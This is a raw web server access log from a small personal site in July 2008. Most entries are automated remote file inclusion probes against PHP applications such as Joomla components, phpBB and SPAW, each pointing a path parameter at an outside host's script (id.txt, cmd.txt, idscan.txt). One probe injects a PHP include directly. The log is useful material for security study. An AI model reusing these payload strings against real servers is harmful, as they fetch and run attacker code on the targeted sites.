76.174.75.83 - warboard [13/Jul/2008:10:01:36 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=dataid&order_type=ASC HTTP/1.1" 200 32909 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=2&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:10:01:39 -0700] "GET /logs/access_080330.log//modules/vwar/admin/admin.php?vwar_root=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [13/Jul/2008:10:01:39 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://keycell.webs.com/IDscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:01:42 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=4&order=dataid&order_type=ASC HTTP/1.1" 200 32925 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=3&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:10:01:54 -0700] "GET /logs/access_080218.log//claroline/phpbb/page_tail.php?includePath=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.174.75.83 - warboard [13/Jul/2008:10:02:01 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=5&order=dataid&order_type=ASC HTTP/1.1" 200 33074 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=4&order=dataid&order_type=ASC" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:10:02:58 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:10:02:58 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:10:02:59 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:03:02 -0700] "GET /logs/access_071223.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:03:53 -0700] "GET /logs/access_080225.log/index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:03:53 -0700] "GET /index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:03:54 -0700] "GET /logs/index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:04:02 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:04:03 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [13/Jul/2008:10:04:10 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [13/Jul/2008:10:04:43 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:05:01 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:05:05 -0700] "GET /?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.810" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:10:05:05 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:05:06 -0700] "GET /logs/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 200 55993 "-" "libwww-perl/5.810" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:10:05:07 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:05:17 -0700] "GET /logs/access_080329.log//claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:05:18 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:05:18 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.36 - - [13/Jul/2008:10:05:19 -0700] "GET /logs/access_071218.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [13/Jul/2008:10:05:20 -0700] "GET /logs/access_071213.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:05:54 -0700] "GET /logs/access_080218.log//codebb/pass_code.php?phpbb_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:06:13 -0700] "GET /logs/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 200 55993 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:06:15 -0700] "GET /logs/access.log//codebb/pass_code.php?phpbb_root_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:06:19 -0700] "GET /?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.810" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:10:06:20 -0700] "GET /logs/index.php?redir=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.4.54 - - [13/Jul/2008:10:06:26 -0700] "GET /index.php?redir=http://gang11.co.cc/file/id.txt??? HTTP/1.1" 200 18397 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:07:11 -0700] "GET /logs/access_080329.log//claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:07:11 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:07:12 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:07:15 -0700] "GET /logs/access_080218.log/index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:07:46 -0700] "GET /logs/access.log/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:07:47 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:07:47 -0700] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:10:07:53 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:10:07:53 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:07:55 -0700] "GET /logs/access_080218.log//claroline/phpbb/page_tail.php?includePath=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:07:59 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/km.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:08:00 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/km.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:08:00 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/km.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:08:00 -0700] "GET /errors.php?error=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:08:07 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:08:07 -0700] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:08:37 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:08:39 -0700] "GET /?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 200 18449 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:08:41 -0700] "GET /logs/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 200 55993 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.36 - - [13/Jul/2008:10:08:57 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:09:10 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.geocities.com/sofiawila/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:10:09:26 -0700] "GET /logs//main.php?sayfa=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:10:09:44 -0700] "GET /logs//common/db.php?commonpath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:10:09:44 -0700] "GET //common/db.php?commonpath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [13/Jul/2008:10:09:44 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.shaker-diffusion.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:10:10:08 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.45 - - [13/Jul/2008:10:10:11 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
43.244.132.32 - - [13/Jul/2008:10:10:20 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:10:11:14 -0700] "GET /logs/access_080221.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:11:18 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:11:38 -0700] "GET /popup.php?path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:11:38 -0700] "GET /logs/popup.php?path=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:10:12:24 -0700] "GET /logs/index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:10:12:27 -0700] "GET /index.php?redir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.22 - - [13/Jul/2008:10:12:49 -0700] "GET /bikes/dteel/2008_02_08/ HTTP/1.1" 200 1132 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.198.175.18 - - [13/Jul/2008:10:13:01 -0700] "GET /logs/access_080223.log/index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.oryapiinsaat.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:13:58 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.51.249 - - [13/Jul/2008:10:14:34 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.0" 200 1551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
83.103.23.40 - - [13/Jul/2008:10:14:40 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [13/Jul/2008:10:14:40 -0700] "GET /logs/access.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [13/Jul/2008:10:15:36 -0700] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
212.50.0.218 - - [13/Jul/2008:10:15:37 -0700] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:10:16:51 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:10:16:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:17:00 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:17:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:17:25 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:17:25 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:17:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:10:17:27 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:10:17:32 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:10:17:33 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [13/Jul/2008:10:17:38 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:17:38 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:17:44 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:17:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:17:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:10:17:46 -0700] "GET /logs/index2.php/?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:10:17:47 -0700] "GET /index2.php/?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:18:05 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.141.56.36 - - [13/Jul/2008:10:18:08 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:18:22 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:18:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:18:23 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:18:39 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:18:50 -0700] "GET /logs/access_080313.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:10:18:54 -0700] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:10:18:57 -0700] "GET /index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 200 18505 "-" "libwww-perl/5.79" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:18:57 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:18:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:18:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:19:29 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:19:33 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:19:33 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:10:19:51 -0700] "GET //includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:10:19:51 -0700] "GET /logs//includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
